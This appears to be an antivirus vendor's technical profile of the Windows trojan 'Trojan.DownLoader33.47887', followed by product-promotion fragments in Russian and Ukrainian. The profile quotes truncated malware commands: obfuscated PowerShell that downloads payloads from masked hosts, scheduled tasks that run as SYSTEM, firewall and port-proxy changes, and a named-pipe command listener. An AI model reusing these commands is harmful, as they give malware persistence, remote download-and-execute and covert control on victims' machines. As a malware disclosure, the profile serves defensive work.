Trojan.DownLoader33.47887

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\blackball
<SYSTEM32>\tasks\lmxl9cjf1p
<SYSTEM32>\tasks\zfh04zh7\901wonr25
<SYSTEM32>\tasks\microsoft\windows\muhovtr\d3nccvj2g
<SYSTEM32>\tasks\t.zer9g.com
<SYSTEM32>\tasks\lvyhoydu
<SYSTEM32>\tasks\vsx5nkod\o5eucs3uqy

Malicious functions

Executes the following

'<SYSTEM32>\netsh.exe' firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block

Modifies file system

Creates the following files

%WINDIR%\temp\if.bin
%WINDIR%\temp\m6.bin
%WINDIR%\temp\m6.bin.exe.ori
%WINDIR%\temp\ac5scsam.0.cs
%WINDIR%\temp\ac5scsam.cmdline
%WINDIR%\temp\ac5scsam.out
%WINDIR%\temp\ac5scsam.pdb
%WINDIR%\temp\cscf9ed.tmp
%WINDIR%\temp\resf9fe.tmp
%WINDIR%\temp\ac5scsam.dll

Deletes the following files

%WINDIR%\temp\resf9fe.tmp
%WINDIR%\temp\cscf9ed.tmp
%WINDIR%\temp\ac5scsam.dll
%WINDIR%\temp\ac5scsam.0.cs
%WINDIR%\temp\ac5scsam.cmdline
%WINDIR%\temp\ac5scsam.out
%WINDIR%\temp\ac5scsam.pdb

Network activity

TCP

HTTP GET requests

http://t.##ynx.com/a.jsp?ma####################################################################################
http://t.##ynx.com/report.jsp?kv#################################################################################################################################################################...
http://d.##kng.com/if.bin?kv################################################################
http://d.##kng.com/m6.bin?kv################################################################
http://d.##kng.com/if_mail.bin?kv################################################################################################################################################################...

UDP

DNS ASK t.##3r0.com
DNS ASK t.##r9g.com
DNS ASK t.##ynx.com
DNS ASK d.##kng.com

Miscellaneous

Creates and executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\ac5scsam.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RESF9FE.tmp" "%WINDIR%\Temp\CSCF9ED.tmp"' (with hidden window)
'<SYSTEM32>\cmd.exe' powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose...' (with hidden window)

Executes the following

'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RESF9FE.tmp" "%WINDIR%\Temp\CSCF9ED.tmp"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\ac5scsam.cmdline"
'<SYSTEM32>\schtasks.exe' /run /tn VsX5nkOD\o5eucS3UQY
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn VsX5nkOD\o5eucS3UQY /F /tr "powershell -c PS_CMD"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase6...
'<SYSTEM32>\schtasks.exe' /run /tn \LvYHoydU
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \LvYHoydU /F /tr "powershell -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.zer9g.com /F /tr t.zer9g.com
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "try{$localMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalMn',[ref]$localMn)}catch{};$ifmd5='5b2849ff2e8c335dcc60fd2155b2d4d3';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.#####.com...
'<SYSTEM32>\cmd.exe' /c powershell -c "try{$localMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalMn',[ref]$localMn)}catch{};$ifmd5='5b2849ff2e8c335dcc60fd2155b2d4d3';$ifp=$env:tmp+'\m6.bin';$down_url='http...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='e5ae6d154a6befc00deea0ccb49dc9b8';$ifp=$env:tmp+'\if.bin';$down_url='http://d.#####.com...
'<SYSTEM32>\cmd.exe' powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose...
'<SYSTEM32>\cmd.exe' /c powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='e5ae6d154a6befc00deea0ccb49dc9b8';$ifp=$env:tmp+'\if.bin';$down_url='http...
'<SYSTEM32>\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa /F
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa1 /F
'<SYSTEM32>\schtasks.exe' /delete /tn Rtsa2 /F
'<SYSTEM32>\schtasks.exe' /run /tn MicroSoft\Windows\mUhOVtR\D3ncCvJ2g
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\mUhOVtR\D3ncCvJ2g /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\schtasks.exe' /run /tn zFh04ZH7\901WONR25
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn zFh04ZH7\901WONR25 /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]:...
'<SYSTEM32>\schtasks.exe' /run /tn \lmXL9cJF1P
'<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \lmXL9cJF1P /F /tr "powershell -w hidden -c PS_CMD"
'<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Di...

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта

Скачать с Google Play

Завантажте
Dr.Web для Android

Безкоштовно на 3 місяці
Всі компоненти захисту
Подовження демо в
AppGallery/Google Pay

Технології

Терміни

Навчання

Міфи

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней